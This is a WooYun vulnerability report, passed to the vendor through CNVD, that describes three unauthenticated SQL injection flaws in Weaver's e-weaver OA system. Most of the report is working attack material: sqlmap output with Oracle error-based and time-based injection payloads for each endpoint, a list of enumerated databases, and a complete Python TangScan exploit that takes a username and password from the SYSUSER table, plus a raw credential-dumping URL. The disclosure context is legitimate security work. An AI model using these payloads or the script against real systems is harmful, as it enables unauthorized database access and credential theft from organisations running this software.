当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140003

漏洞标题:泛微OA通用系统三处SQL注入打包(官网可复现无需登录)

相关厂商:泛微OA

漏洞作者: 浮萍

提交时间:2015-09-12 16:24

修复时间:2015-12-13 23:06

公开时间:2015-12-13 23:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商已经确认,细节仅向厂商公开
2015-09-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

一个一个文件翻看太麻烦了
三处
官网为例

详细说明:

第一处:
缺陷文件/mobile/plugin/loadWfGraph.jsp
http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1*

Snap114.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1
&requestid=1' AND 3708=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)
||CHR(113)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (3708=3708) THEN 1 ELSE 0 END
) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(111)||CHR(113)||CHR(62))) FROM D
UAL) AND 'IhpV'='IhpV
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1
&requestid=1' AND 5058=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CH
R(104),5) AND 'IXww'='IXww
---
[16:30:43] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


数据库

available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


第二处
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1

Snap115.jpg


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 109 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subpro
cess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 2569=(SELECT UPPER(XM
LType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(116)||CHR(98)||CHR(113)||(SELECT
 (CASE WHEN (2569=2569) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(1
19)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'noSD'='noSD
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.subpro
cess.servlet.SubprocessAction?action=getlist&nodeid=1' AND 6418=DBMS_PIPE.RECEIV
E_MESSAGE(CHR(81)||CHR(72)||CHR(65)||CHR(108),5) AND 'mcMO'='mcMO
---


第三处
http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*

Snap116.jpg


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 53 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workfl
ow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 9830=(SELE
CT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(97)||CHR(104)||CHR(11
3)||(SELECT (CASE WHEN (9830=9830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(
111)||CHR(109)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'ByUc'='ByUc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:9085//ServiceAction/com.eweaver.workflow.workfl
ow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2' AND 3045=DBMS_
PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(82)||CHR(119)||CHR(114),5) AND 'dOdb'='dOdb
---
[16:37:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


漏洞证明:

一个一个验证太慢了
这里使用tangscan脚本

#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://**.**.**.**/)
See the file 'docs/COPYING' for copying permission
author: 浮萍 <fate0@**.**.**.**>
"""
import re
from thirdparty import requests
from modules.exploit import TSExploit
__all__ = ['TangScan']
class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "泛微eweaver系统SQL注入检测1",
            "product": "weaver",
            "product_version": "",
            "desc": "",
            "license": self.license.TS,
            "author": "浮萍",
            "ref": [
                {self.ref.wooyun: "**.**.**.**"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": "",
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {
                "user_info": {
                    "username": "",
                    "password": ""
                },
                "db_info": {
                    "version": "",
                }
            },
            "description": "",
            "error": ""
        })
    def verify(self):
        self.print_debug("verify start")
        re_version_pattern = **.**.**.**pile(r'qaflq(.+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' AND 9945=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(Banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113))) FROM DUAL) AND 'jsWv'='jsWv".format(domain=self.option.url))
        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
        re_result = re_version_pattern.findall(response.content)
        
        
        if len(re_result) == 0:
            self.result.status = False
            return
        self.result.status = True
		
        ls_result = re_result[0]
        ls_result = ls_result.replace('quq',' ')
        self.result.data.db_info.version = ls_result
        self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format(
            url=self.option.url,
            db_version=ls_result
        )
    def exploit(self):
        self.print_debug("exploit start")
        
        re_userinfo_pattern = **.**.**.**pile(r'qaflq(\w+?)\quq(\w+?)qaflq', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1'  AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI".format(domain=self.option.url))
        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return
        self.result.status = True
        self.result.data.user_info.username = re_result[0][0]
        self.result.data.user_info.password = re_result[0][1]
        self.result.description = "目标 {url} 存在sql注入, 其中一个用户: {username}, 密码: {password}".format(
            url=self.option.url,
            username=self.result.data.user_info.username,
            password=self.result.data.user_info.password
        )
if __name__ == '__main__':
    from modules.main import main
    main(TangScan())


第二处和第三处类似
只需更改exp_url即可
案例1
http://**.**.**.**

Snap117.jpg


Snap118.jpg


案例2
http://**.**.**.**/

Snap119.jpg


案例3
http://**.**.**.**

Snap120.jpg


PoC可能有点问题
在获取用户名密码的时候会出错

http://**.**.**.**//mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1'  AND 2341=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(concat(LONGONNAME||CHR(113)||CHR(117)||CHR(113),LOGONPASS) AS VARCHAR(4000)),CHR(32)) FROM SYSUSER WHERE rownum = 1),CHR(32),CHR(113)||CHR(117)||CHR(113)),CHR(36),CHR(113)||CHR(115)||CHR(113)),CHR(64),CHR(113)||CHR(117)||CHR(113)),CHR(35),CHR(113)||CHR(111)||CHR(113)))||CHR(113)||CHR(97)||CHR(102)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL) AND 'tJNI'='tJNI#


Snap122.jpg


乱码请无视

修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-14 23:05

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无